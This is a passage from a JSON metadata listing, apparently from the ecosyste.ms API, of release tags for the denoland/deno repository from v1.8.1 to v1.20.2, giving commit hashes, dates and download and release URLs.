2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_a